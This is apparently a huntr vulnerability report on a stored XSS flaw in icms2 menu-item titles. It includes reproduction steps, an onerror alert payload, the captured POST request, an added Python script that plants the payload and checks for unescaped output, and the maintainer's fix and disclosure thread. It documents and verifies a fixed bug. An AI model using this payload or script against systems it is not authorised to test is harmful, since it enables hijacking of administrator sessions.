Stored XSS in title in instantsoft/icms2

Valid

Reported on

Jul 22nd 2023


Description

There is a stored XSS vulnerability in the item title of the menu on the administrator screen: HTML entered as a menu item's title is saved as-is and rendered unescaped, so script in it executes whenever an administrator views the menu.

Proof of Concept

Step 1. Log in to the admin screen and select Add New Item in Menu.
Step 2. Enter the following payload as the item title and save it.
Step 3. Once saved, the script executes every time the administrator screen renders the menu item, with no further interaction from the administrator.

Payload

<img src=x onerror=alert(document.domain)>

Request

POST /admin/menu/item_add/1/40 HTTP/2
Host: localhost
 ...
-----------------------------270651214445377498288823999
Content-Disposition: form-data; name="title"

<img src=x onerror=alert(document.domain)>
-----------------------------270651214445377498288823999
 ...
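The following script reproduces the check above against a local instance and reports whether the stored title comes back raw or HTML-encoded. It is an added example, not code from the huntr report or from the icms2 project. The item_add path, the field name "title" and the boundary are taken from the request shown; the admin session cookie, the path of the admin page that lists menu items (LIST_PATH) and any extra form fields are placeholders that you must fill in from your own instance, since the report elides them with "...".

```python
"""Check whether a menu-item title is rendered unescaped on the admin screen.

Added example for the icms2 stored-XSS report; not part of the report or
of icms2. Only the item_add path, the "title" field and the boundary come
from the captured request. BASE_URL, SESSION_COOKIE, LIST_PATH and
EXTRA_FIELDS are assumptions to be adjusted for the target instance.
"""
import html
import urllib.request

PAYLOAD = '<img src=x onerror=alert(document.domain)>'
BOUNDARY = '---------------------------270651214445377498288823999'  # from the report

BASE_URL = 'http://localhost'                 # assumption
SESSION_COOKIE = 'PHPSESSID=REPLACE_ME'       # assumption: a logged-in admin session
ADD_PATH = '/admin/menu/item_add/1/40'        # from the report (menu 1, parent 40)
LIST_PATH = '/admin/menu/items/1'             # assumption: page that renders the item titles
EXTRA_FIELDS = {}                             # assumption: other fields the real form sends


def build_multipart(fields: dict, boundary: str) -> bytes:
    """Encode fields as multipart/form-data, in the shape of the PoC request."""
    parts = []
    for name, value in fields.items():
        parts.append(
            f'--{boundary}\r\n'
            f'Content-Disposition: form-data; name="{name}"\r\n\r\n'
            f'{value}\r\n'
        )
    parts.append(f'--{boundary}--\r\n')
    return ''.join(parts).encode('utf-8')


def classify(page_html: str, payload: str) -> str:
    """Decide how the stored title came back on the admin page.

    'vulnerable': the raw payload is present, so the onerror handler would fire.
    'fixed'     : only the HTML-encoded form (&lt;img ...&gt;) is present.
    'absent'    : neither, i.e. wrong page, item not saved, or value dropped.
    A page containing both forms is still vulnerable; the raw copy wins.
    """
    if payload in page_html:
        return 'vulnerable'
    if html.escape(payload) in page_html:
        return 'fixed'
    return 'absent'


def check(base_url: str = BASE_URL, cookie: str = SESSION_COOKIE) -> str:
    """Store the payload as a menu-item title, then inspect the listing page."""
    fields = dict(EXTRA_FIELDS)
    fields['title'] = PAYLOAD
    body = build_multipart(fields, BOUNDARY)
    add = urllib.request.Request(
        base_url + ADD_PATH,
        data=body,
        method='POST',
        headers={
            'Cookie': cookie,
            'Content-Type': f'multipart/form-data; boundary={BOUNDARY}',
        },
    )
    with urllib.request.urlopen(add) as resp:  # redirect after save is followed automatically
        resp.read()
    listing = urllib.request.Request(base_url + LIST_PATH, headers={'Cookie': cookie})
    with urllib.request.urlopen(listing) as resp:
        page = resp.read().decode('utf-8', errors='replace')
    return classify(page, PAYLOAD)


if __name__ == '__main__':
    print(check())
```

classify() treats the page as vulnerable whenever the literal payload appears anywhere in the response, which is the right call for this report: the title is rendered into HTML text, where an unencoded `<img>` tag is enough for `onerror` to run. A value that only survives as `&lt;img ...&gt;` is inert in that context, which is what a correct fix (HTML-encoding the title on output) produces.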

PoC Video

https://drive.google.com/file/d/1DjT6hbPBXpIs2pbrZ1EZZluZDOSDjeMk/view?usp=sharing

Impact

The payload is stored with the menu item and runs in the browser of every administrator who views the menu, so it executes with administrator privileges. From that position a script can read the administrator's session and page content, issue requests to the admin panel on the administrator's behalf (account compromise), and alter or deface site content, which in turn can be used to serve malware or to phish users for their credentials.
Creating a menu item requires an account that can already use the admin screen, so the realistic attacker is a lower-privileged editor or a compromised admin account; this limited precondition is why the report carries a Low severity.

We are processing your report and will contact the instantsoft/icms2 team within 24 hours. 2 months ago
morioka12 modified the report
2 months ago
We have contacted a member of the instantsoft/icms2 team and are waiting to hear back 2 months ago
instantsoft/icms2 maintainer
2 months ago

Maintainer


Fixed https://github.com/instantsoft/icms2/commit/1dbc3e6c8fbf5d2dc551cb27fad0de3584dee40f

morioka12
2 months ago

Researcher


@maintainer Thanks for your fix. Can you give me a status update and a CVE request?

instantsoft/icms2 maintainer
2 months ago

Maintainer


@morioka12 Thanks for finding the problem. Status update - committed to the master branch on github. Unfortunately, I don't know what a "CVE request" is.

morioka12
2 months ago

Researcher


@maintainer I believe there is a button to 'mark as fixed' on this report from huntr and also assign a CVE. And please disclose this report as well.

instantsoft/icms2 maintainer modified the Severity from Low (3.8) to Low (3.5) 2 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
instantsoft/icms2 maintainer validated this vulnerability 2 months ago
morioka12 has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
instantsoft/icms2 maintainer marked this as fixed in 2.16.1-git with commit 1dbc3e 2 months ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
instantsoft/icms2 maintainer published this vulnerability 2 months ago
instantsoft/icms2 maintainer
2 months ago

Maintainer


@morioka12 Did I do everything right or is there anything else you need from me?

morioka12
2 months ago

Researcher


@maintainer No problem. Thank you very much!
